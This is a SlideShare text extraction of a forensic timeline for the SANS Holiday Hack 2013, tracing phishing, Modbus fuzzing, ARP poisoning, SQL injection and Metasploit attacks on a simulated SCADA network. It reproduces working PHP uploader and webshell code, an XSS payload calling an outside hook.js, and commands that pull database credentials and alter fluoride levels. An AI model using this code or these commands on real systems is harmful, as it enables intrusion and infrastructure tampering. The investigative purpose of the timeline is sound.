SANS Holiday Hack 2013 – Investigation Timeline

43 %
57 %
Information about SANS Holiday Hack 2013 – Investigation Timeline
Education

Published on February 20, 2014

Author: giacomo83m

Source: slideshare.net

Description

PCAP file analysis of successful and failed attacks to a simulated SCADA network. The work received an 'Honerable mention' from SANS Institute

WireShark Frame UTC Data Time StreamID N. 0 12/9/2013 20:53:01 Source 3 55 63 10.25.22.253 69.16.175.10 HTTP 10.25.22.253 82.103.134.102 HTTP 10.25.22.253 10.16.11.5 POP 12/11/2013 14:30:01 12/11/2013 14:31:47 12/11/2013 14:32:20 Destionation 10.25.22.253 10.25.22.250 Port or Protocol HTTP Event SANS  Holiday  Hack  2013  -­‐  Investigation  Timeline Attack Status Analyst Comments First Packet in CAP Evidence WebSite ValleyElectric TrafficSystemNetworkMap.pdf BedfordFallsTrainSystem.pdf None PDF were checked with Wepawet and doesn't contains any malicious script. They contains network description summarized in 'Assets' Excel tab. GET /pub/firefox/releases/26.0/update/win32/en-US/firefox-25.0.1-26.0.partial.mar http://noscript.net USER: dsawyer / PASS: Fashionista From george.bailey@valleyelectr1c.co.nw Fri Dec 06 10:53:05 2013 -0500 Delivered-To: don.sawyer@valleyelectric.co.nw None None Failed I'm running around trying to take care of a bunch of tasks today. Can you monitor the Simatic S7-1200 PLC while I am out today? Just click the link below and keep the window open; if the controller shows "red", then let me know. http://10.25.22.23/Portal/Portal.mwsl?PriNav=Start&Send='><script src="http://10.2.2.2:3000/hook.js”>&elementId=31337&Si=maticModel=371200&ControlInterfaceEnabled&StationName=CP U1212C_ACD=CRly&OperatingMode=Run&ShowStatusColorYES After a browser update Noscript page is automatically opened, that Malicious Domain: valleyelectr1c.co.nw It has the number 1 instead of the letter I. XSS: Cross site scripting attacks that injects javascript from http://10.2.2.2:3000/hook.js Send Variable of the page http://10.25.22.23/Portal/Portal.mwsl is Vulnerable to XSS Attacks The link was not clicked ( No Evidences ! ) Noscript blocks XSS attempts. 3792 4323 12/11/2013 15:36:27 12/11/2013 15:36:29 10.21.22.253 Many 10.21.22.253 Many ARP TCP ARP SWEEP/Network Scan Port Sweep: 80, 443, 102,502,1089,1090,1091,4000,4848,20000,34962,34963, 44818 Recon Recon Enumerate IP addresses in 10.21.22.0/24 Enumerate TCP Services of: 10.21.22.1 10.21.22.10 10.21.22.22 10.21.22.23 10.21.22.24 4782 12/11/2013 15:37:08 10.21.22.253 Many ARP ARP REPLY (FAKE - ARP POISINING) Duplicate IP address detected for 10.21.22.23 (00:0c:29:f7:f4:9a) - also in use by 5c:86:4a:00:6c:02 (frame 4739) Done Man In the Middle ( The attacker mac address - 00:0c:29:f7:f4:9a ) is in arp cache 00:0c:29:f7:f4:9a of all target IP Addresses enumerated above and sniff communication between master al slaves 5621 159 12/11/2013 15:38:01 12/11/2013 15:38:41 10.21.22.253 Many 10.21.22.253 74.125.22.82 ARP HTTP END ARP POISONING modscan_0.1.tar downloaded Recon ModScan is a new tool designed to map a SCADA MODBUS TCP based network. The tool is written in python for portability and can be used on virtually any system with few required libraries 161 12/11/2013 15:39:58 10.21.22.253 81.169.180.37 HTTP 12/11/2013 15:39:59 10.21.22.253 81.169.180.37 HTTPS Modbus Fuzzer WebPage and Protocol Description redirect to https://www.scadaforce.com/modbus ModBus WebPage: https://www.scadaforce.com/modbus None 162 163 12/11/2013 15:40:16 10.21.22.253 81.169.180.37 HTTP Modbus ModLib Fuzzer redirect to https://www.scadaforce.com/ModLib.py None 164 12/11/2013 15:40:16 10.21.22.253 81.169.180.37 HTTPS ModLib.py Download: https://www.scadaforce.com/ModLib.py Recon 165 12/11/2013 15:40:47 10.21.22.253 10.21.22.23 Recon 12/11/2013 15:42:45 10.21.22.23 10.21.22.253 MODBUS 502/TCP 502/TCP Transaction 2, Unit 0, Function 0 (Unknown) 168 Modbus function 15: Write Multiple Coils. Exception: Slave device failure Failed The library can be used as a Modbus fuzzer to send arbitrary and unexpected data to the Modbus server. Furthermore, the library is able to monitor the reaction of the Modbus server. If the Modbus server stops responding, it is assumed that the server stopped working properly. Besides packet generation, sent network packets needs to be recorded in order to repeat exceptions. SCADA ModBus fuzzing over Traffic Grid Controller of Corner of Main & Potter Function 15 failed. No coils has been modified 168 12/11/2013 15:42:50 10.21.22.23 10.21.22.253 502/TCP Modbus function 15: Write Multiple Coils. Exception: Slave device failure Failed Function 15 failed. No coils has been modified 243 12/11/2013 17:51:01 10.2.2.2 10.22.11.9 HTTP indicator=F- LIMIT INTO OUTFILE var www tmpurykq.php LINES TERMINATED BY Done <?php if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_na me"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/var/www> <input type=submit name=upload value=upload></form>";}?> Sqlmap is used to exploit SQLInjection: A php file uploader is loaded to remote webserver exploiting the vulnerability of 'indicator' POST variable present in reports.php page. 245 12/11/2013 17:51:02 10.2.2.2 10.22.11.9 HTTP POST WEBSHELL TMPBUASE Done Content-Disposition: form-data; name="file"; filename="tmpbuase.php" <?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable _functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_ open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512) ;}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents ();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclo se($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?> That's a second stage of SQLMap exploiting. A webshell is uploaded to permit the attacker to execute remote commands. Recon MODBUS/TCP Modbus is a stateless protocol and does not support authentication or encryption. Therefore, the Modbus server will interpret and possibly answer every Modbus request it receives. The Modbus client (also called master) sends a request to the server (also called slave) and the server sends either an answer, exception or nothing back. An answer to a read coils request is visualized in the following figure. Output 1 corresponds to the least-significant bit (LSB) and output 5 to the fifth most significant bit (MSB). Because the request only requested 5 bits of data, three bits of the output (bits 6,7,8) are unused.

247 12/11/2013 17:51:10 10.2.2.2 10.22.11.9 HTTP $ ls alarms.php css/ denied.php footer.php header.php images/ index.php js/ login.php logout.php reports.php tmpbuase.php tmpurykq.php Done Directory Listing using a webshell 248 12/11/2013 17:51:13 10.2.2.2 10.22.11.9 HTTP $ grep mysql_connect * mysql_connect("localhost","wq-ro","publicworks") Done The attacker searchs and finds mysql credentials: USER wq-ro / PASS publicworks 249 12/11/2013 17:51:30 10.2.2.2 10.22.11.9 HTTP echo "update measurement_levels set min=0 where id=4;" | mysql -u wq-ro -ppublicworks wq Done Attacker set 'min' value of measurement_levels of row id 4 to 0 reason? 250 12/11/2013 17:51:39 10.2.2.2 10.22.11.9 HTTP echo "select * from measurement_levels where id=4;" | mysql -u wq-ro -ppublicworks wq id:4 indicator_short:Findicator_long:Flouride measurement_type:ppm min:0 mcl:4 mclg:4 None Verification of UPDATE sql command described in SessionID 249 The previous attack (ID249) was successfull, now the min value for ID=4 is zero. 252 12/11/2013 17:51:52 10.2.2.2 10.22.11.9 HTTP echo "update additives set amount=0 where id=4;" | mysql -u wq-ro -ppublicworks wq ERROR 1142 (42000) at line 1: UPDATE command denied to user 'wq-ro'@'localhost' for table 'additives' Failed Permission denied ( web user doesn't have grants to do that operation ) 253 12/11/2013 17:51:59 10.2.2.2 10.22.11.9 HTTP echo "select * from additives where indicator_id=4;" | mysql -u wq-ro -ppublicworks wq indicator_id:4 indicator_short:Famount:1.8 None Attempt to change Fluoride value Enumerate IP addresses in 10.21.22.0/24 MITM 10.25.22.22 & 10.25.22.30 MITM STOPPED AT 2013-12-12 20:34:04 (not graceful shutdown) Failed ( Dest MacAddr 00:00:00:00:00:00 ) Recon, Understand Services Opened 13143 12/12/2013 20:28:12 13681 12/21/2013 20:28:14 ARP ARP ARP SWEEP ARP POISONING Recon Failed 13737 12/12/2013 20:28:39 10.25.22.252 10.25.22.30 TCP PortSweep (SynScan) from 10.25.22.252 to 10.25.22.30 Recon 13749 12/12/2013 20:28:39 342 10.25.22.252 Many 10.25.22.252 Many 10.25.22.252 10.25.22.22 TCP PortSweep (SynScan) from 10.25.22.252 to 10.25.22.22 Recon 10.25.22.252 216.22.25.175 HTTP http://forums.mrplc.com/index.php?showtopic=20793 Recon 10.25.22.252 10.25.22.252 10.25.22.252 10.25.22.252 HTTP HTTP HTTP HTTP guest login (default credentials) administrator login (default credentials) admin (Default credentials) administrator (Default credentials) Failed Failed Failed Failed POP USER: dsawyer / PASS: Fashionista From george.bailey@valleyelectr1c.co.nw Fri Dec 24 19:22:11 2013 -0400 Delivered-To: don.sawyer@valleyelectric.co.nw Done 12/12/2013 21:30:40 344 345 346 347 388 12/25/2013 3:10:55 10.25.22.22 10.25.22.22 10.25.22.22 10.25.22.22 10.25.22.253 10.16.11.5 Online forum browsing to gather MicroLogix 1100 default password For full privileges,cred. are administrator/ml1100 For read-only privileges cred. are guest/guest From Wireshark tcp.stream eq 347 to 363 the attacker continues brute forcing attack using many different passwords Malicious sender already seen in EMAIL analyzed in Wireshark StreamID 63 The Attack is successfull the link is opened in Wireshark StreamID 389 A significant vulnerability in the Allen Bradley controller we are testing was just disclosed. I was able to grab the firmware update. Can you run this patch executable from the control host? The release notes say it will run silently to completion. 389 12/25/2013 3:11:05 10.25.22.253 10.2.2.2 HTTP TCP/8081 390 12/25/2013 3:11:18 10.25.22.253 10.21.22.253 TCP/1225 394 449 450 453 18739 12/25/2013 3:11:52 12/25/2013 3:14:49 12/25/2013 3:15:13 12/25/2013 3:15:13 12/25/2013 3:15:42 10.25.22.253 10.25.22.253 10.25.22.253 10.25.22.253 10.16.92.103 454 12/25/2013 3:15:54 454 455 459 460 GET /ab-qfe.exe HTTP/1.1 Host: files.valleyelectr1c.co.nw:8081 HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/2.7.5 Date: Wed, 11 Dec 2013 23:17:28 GMT Last-Modified: Wed, 11 Dec 2013 17:16:49 GMT Metasploit Payload: Meterpreter HTTP/HTTPS Communication: reverse_http/reverse_https https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication Done Done Malicious Domain Server DateTime mismatches to FrameTIme The executable was uploaded 5 hours before the download AB-QFE.EXE is a Dropper. When executed it connects to 10.21.22.253:1225. It is related to Metasploit Metaterpreter HTTPS_Reverse StreamID 390 Metasploit Payload ARP SMB SMB SMB HTTP ARP SWEEP Login User: OMyxDDzY Failed Ernie Login Failed Ernie Login Successfull 10.25.22.254IPC$ Image update of Axis Communication Network Camera Recon Enumerate IP addresses in 10.25.22.253 Failed Done Done Password Authentication Password Authentication 10.25.22.253 10.25.22.58 SMB Done The attacker install malicious service that will load a backdoor (StreamID 459) 12/25/2013 3:16:01 12/25/2013 3:15:54 10.25.22.253 10.25.22.58 10.25.22.253 10.25.22.58 SMB TCP/4444 WORKGROUPErnie Successfull Login 10.25.22.58ADMIN$ Access CreateFile PJzJEubs.exe WriteFile Content OpenSCManagerW CreateServiceW ServiceName:QEwHRzjs DisplayName:MHaBRU StartServiceW ServiceName:QEwHRzjs Connection Attempt ( Reverse Connection - Backdoor ) SYN/RST Done Failed Backdoor service started Port is still closed 12/25/2013 3:16:01 10.25.22.253 10.25.22.58 TCP/4444 10.25.22.253 transfers to 10.25.22.58 REFLECTIVELOADER DLL Library. Done 12/25/2013 3:16:04 10.25.22.253 10.25.22.58 Analysis of the sample suggests that DLL is VNC inject payload of Metasploit Framework: windows/vncinject/bind_tcp: Listen for a connection), Inject a VNC Dll via a reflective loader. 4444 is the default tcp listening port. The attacker shutdowns the power grid and writes on Notepad "Merry Christmas, George Bailey, You Lose!" SCADA Commands to Shutdown the grid executed by Control Panel via abusive VNC connection 10.25.22.58 10.25.22.58 10.25.22.58 10.16.92.79 460 453 Done 10.25.22.58 10.25.22.20 VNC TCP/4444 CIP 10.25.22.253 Opens VNC (vs. 3.8) Connection to 10.25.22.58 24453 12/25/2013 3:16:23 Common Industrial Protocol (SCADA) From Control Panel to Rockwell Automation System Done 24596 12/25/2013 3:16:25 12/25/2013 3:17:20 12/25/2013 3:17:26 10.25.2258 10.25.22.20 10.25.22.253 10.25.22.58 10.16.92.103 10.16.92.79 CIP TCP/4444 HTTP CIP SetAttribute VNC Connection Closed Last Packet in CAP Evidence. Streaming Update of Axis Communication Network Camera Done None Evidence of VNC Actions on Workstation Display Please refer to evidences.

Add a comment

Related presentations

Related pages

Timeline of Target's Data Breach And Aftermath: How ...

... following the massive data breach during the holiday ... Timeline of Target's Data ... the hack. Dec. 15, 2013: Target confirms that ...
Read more

SANS DFIR WebCast - Super Timeline Analysis - YouTube

SANS DFIR WebCast - Super Timeline Analysis ... Over the past year investigators have started to use timeline analysis to ... investigation ...
Read more

SANS Digital Forensics and Incident Response Blog | Blog ...

SANS Digital Forensics and Incident Response Blog. 08 Jan 2016. ... Timeline Analysis (22) Training (37) USB Device Analysis (13) Volatility (2) Windows IR ...
Read more

SANS Institute InfoSec Reading Room

Target shoppers got an unwelcome holiday surprise in Decem ber 2013 when ... Timeline of Target's data ... from SANS Institute: http://www.sans.org ...
Read more

SANS Institute InfoSec Reading Room

SANS Institute InfoSec Reading Room ... 2013). Others can access ... A timeline showing the count of results is included by default
Read more

Target’s Data-Breach Timeline - Corporate Intelligence - WSJ

... U.S. stores during the holiday ... Timeline . Article ... investigation: Nov. 27-Dec. 15: A data hack at U.S. Target stores ...
Read more

Digital Forensics Training | Incident Response Training | SANS

The Computer Forensics, Investigation and Response course from ... "SANS Computer Forensics Graduate Thwarts Bank ... "A great course on timeline, ...
Read more

Snacks - Criminal Case Wiki - Wikia

There are 3 types of snacks: Orange Juice: ... They cannot be harvested on timelines, ... (25 July 2013), burgers gave 100 energy points.
Read more